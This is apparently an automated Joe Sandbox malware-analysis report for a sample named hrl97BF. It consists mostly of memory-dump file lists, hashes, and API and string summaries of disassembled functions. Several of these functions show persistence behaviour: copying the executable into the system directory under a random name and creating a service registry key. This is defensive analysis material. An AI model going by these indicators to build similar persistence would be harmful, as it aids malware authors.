Memory Dump Source

Source File: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8def141823eaeae6cde13e11ae20021037d3a6ae5ae00fe4e6870b9a90bf37d9
Instruction ID: d87477072c5758a900aba4f5c189c8769db751d19ec5dc3a13cb4d6bc656c2d6
Opcode Fuzzy Hash: 8def141823eaeae6cde13e11ae20021037d3a6ae5ae00fe4e6870b9a90bf37d9
Instruction Fuzzy Hash: 7321BE732061215FD711DE29CD95FEE7361AB81728F148356DC244F286DB368AD6C6C3

Function 0042887F Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd4db434fc62e517b86b69493e8fb0222cb7bd3f69c5fc92b6f384e28e32025
Instruction ID: f33a156f2a793f2b241488fcf13e9bc6ec48b5d09705d723da7567139f1fc87d
Opcode Fuzzy Hash: bcd4db434fc62e517b86b69493e8fb0222cb7bd3f69c5fc92b6f384e28e32025
Instruction Fuzzy Hash: 3A1187777051205FCB15AA38D844BAFB391EBC4338F54436EA9148B285EE3996458780

Function 004369D9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4219628e2e45644285e776e2269212ba1003bd1e25755659efc044daeb246d
Instruction ID: 71cd4a28e4d2dae000c282f11a0f6bd61e1312517a305b6e8b44f642620b02f8
Opcode Fuzzy Hash: dc4219628e2e45644285e776e2269212ba1003bd1e25755659efc044daeb246d
Instruction Fuzzy Hash: FD019C336041226FC7166E39C91469E77D6AFCA318F12D37BD0156B508CF79A6078A81

Function 006F025E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9218cfa05aaedef510c328bf7faf8a47d566a572764a29d5daf759a9c17380e6
Instruction ID: e37239cab1c7aa4818ea33ecb8d5b043c98d403fde929a56f4e89ecb3ac15748
Opcode Fuzzy Hash: 9218cfa05aaedef510c328bf7faf8a47d566a572764a29d5daf759a9c17380e6
Instruction Fuzzy Hash: 8F0124322441495BE720EF78CC89BADF7A2EBC8734F108328E6944A187D731A2958661

Function 004019C0 Relevance: 152.7, APIs: 29, Strings: 58, Instructions: 421libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00401A1E
GetProcAddress.KERNEL32(00000000), ref: 00401A27
LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 00401A37
GetProcAddress.KERNEL32(00000000), ref: 00401A3A

Part of subcall function 00401660: strstr.MSVCRT ref: 004016A7
Part of subcall function 00401660: strcspn.MSVCRT ref: 004016C4
Part of subcall function 00401660: strncpy.MSVCRT ref: 004016D3
Part of subcall function 00401660: strcspn.MSVCRT ref: 004016E3

Part of subcall function 00402F70: GetLocaleInfoW.KERNEL32(00000800,00000002,?,00000040,?,76F8F550,76F90BD0,00000072), ref: 00402F8B
Part of subcall function 00402F70: GetComputerNameA.KERNEL32 ref: 00402FA2
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402FBB
Part of subcall function 00402F70: strstr.MSVCRT ref: 00403024
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,Windows NT), ref: 00403114
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 0040313D

Part of subcall function 00401980: LoadLibraryA.KERNEL32 ref: 004019A0

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52

Strings

l, xrefs: 00401B11
l, xrefs: 00401FA4
D, xrefs: 00401B2A
i, xrefs: 004019FB
<6@, xrefs: 00402068
d, xrefs: 00401B07
d, xrefs: 00401B4C
i, xrefs: 00401B60
l, xrefs: 00401B0C
o, xrefs: 00401B56
d, xrefs: 00401F9A
l, xrefs: 00401B65
PlusCtrl.dll, xrefs: 00401C45
t, xrefs: 00401F8B
e, xrefs: 00401FA9
o, xrefs: 00401F95
F, xrefs: 00401B5B
GetTempPathA, xrefs: 00401A29
F, xrefs: 00401A0A
u, xrefs: 00401F9F
A, xrefs: 00401B6F
w, xrefs: 00401B34
e, xrefs: 00401F86
a, xrefs: 00401FC7
100200, xrefs: 00401F25, 00401F64
w, xrefs: 00401AB5
e, xrefs: 00401FBD
G, xrefs: 00401F7B
W, xrefs: 004019F2
kernel32.dll, xrefs: 004019E5, 00401A2E, 00401F04, 00401F19, 00401F81
A, xrefs: 00401FD6
a, xrefs: 00401B47
L, xrefs: 00401B25
m, xrefs: 00401AF4
T, xrefs: 00401B51
l, xrefs: 00401A14
ExitProcess, xrefs: 00401F14
o, xrefs: 00401B2F
R, xrefs: 00401B20
SetFileAttributesA, xrefs: 00401EFF
e, xrefs: 00401A19
m, xrefs: 00401FCC
l, xrefs: 00401AEF
o, xrefs: 00401AF9
i, xrefs: 00401A0F
., xrefs: 00401B02
t, xrefs: 00401A00
l, xrefs: 00401FB8
o, xrefs: 00401B42
u, xrefs: 00401AE6
F, xrefs: 00401FAE
M, xrefs: 00401F90
l, xrefs: 00401B3D
N, xrefs: 00401FC2
i, xrefs: 00401FB3
e, xrefs: 00401B6A
e, xrefs: 00401FD1
U, xrefs: 00401B1B

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$lstrcpy$AddressCloseHandleProcstrcspnstrstr$ComputerInfoLocaleNamestrncpy
String ID: .$100200$<6@$A$A$D$ExitProcess$F$F$F$G$GetTempPathA$L$M$N$PlusCtrl.dll$R$SetFileAttributesA$T$U$W$a$a$d$d$d$e$e$e$e$e$e$i$i$i$i$kernel32.dll$l$l$l$l$l$l$l$l$m$m$o$o$o$o$o$t$t$u$u$w$w
API String ID: 3552227398-19183163
Opcode ID: 379116b2d88aa8af1ebcdaaeb2c968e704b39e4d9bc54b5ade393c686307fa29
Instruction ID: 6d36ee71d4a81d0c90f4322b46838c243b43bcae610d34eb8121a6d16edaaa69
Opcode Fuzzy Hash: 379116b2d88aa8af1ebcdaaeb2c968e704b39e4d9bc54b5ade393c686307fa29
Instruction Fuzzy Hash: 5A02C57050C380DAE310CB74DD48B5BBBE5AB95704F04492DF6D5A72E2D7BA9808CB6B

Function 00402B40 Relevance: 51.0, APIs: 12, Strings: 17, Instructions: 217stringlibraryfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000047), ref: 00402BF5
GetProcAddress.KERNEL32(00000000), ref: 00402BFC
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402C1F
strncmp.MSVCRT ref: 00402C44
lstrcatA.KERNEL32(?,004084F4), ref: 00402CD0
lstrcatA.KERNEL32(?,?), ref: 00402CE0
CopyFileA.KERNEL32(?,?,00000000), ref: 00402CF1
lstrcpyA.KERNEL32(?,?), ref: 00402D14
GetLastError.KERNEL32 ref: 00402D8F
lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402DE1
lstrcatA.KERNEL32(?,?), ref: 00402DEF
lstrlenA.KERNEL32(00402AB1), ref: 00402E0E

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Strings

M, xrefs: 00402B7C
m, xrefs: 00402BCE
d, xrefs: 00402B8A
A, xrefs: 00402BDB
<6@, xrefs: 00402CB5
G, xrefs: 00402B66
%c%c%c%c%c%c.exe, xrefs: 00402CA9
Description, xrefs: 00402E1A
F, xrefs: 00402BA6
a, xrefs: 00402BC7
t, xrefs: 00402B75
kernel32.dll, xrefs: 00402BF0
SYSTEM\CurrentControlSet\Services\, xrefs: 00402DD5
o, xrefs: 00402B83
u, xrefs: 00402B91
i, xrefs: 00402BAD
N, xrefs: 00402BC0

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AddressCopyCountDirectoryErrorFileLastLibraryLoadProcSystemTicklstrlenrandstrncmp
String ID: %c%c%c%c%c%c.exe$<6@$A$Description$F$G$M$N$SYSTEM\CurrentControlSet\Services\$a$d$i$kernel32.dll$m$o$t$u
API String ID: 2930506891-2104832695
Opcode ID: 79df84dcddb17782a356b93d0bf0c5b2b01855d991385c97858fe82d4394e814
Instruction ID: a50e26587b69554a2a762d444c19ea56879ec6abf88ed33a43cf8b764e003199
Opcode Fuzzy Hash: 79df84dcddb17782a356b93d0bf0c5b2b01855d991385c97858fe82d4394e814
Instruction Fuzzy Hash: 10812BB2900258ABD721DB60DD89FDEBB7CAF55B00F0401E9F609B61C2D6B45B84CF69

Function 00402520 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 196stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402533
lstrcatA.KERNEL32(?,100200), ref: 00402543
RtlZeroMemory.KERNEL32 ref: 00402587

Strings

100200, xrefs: 0040253D, 004026DE, 004026EB
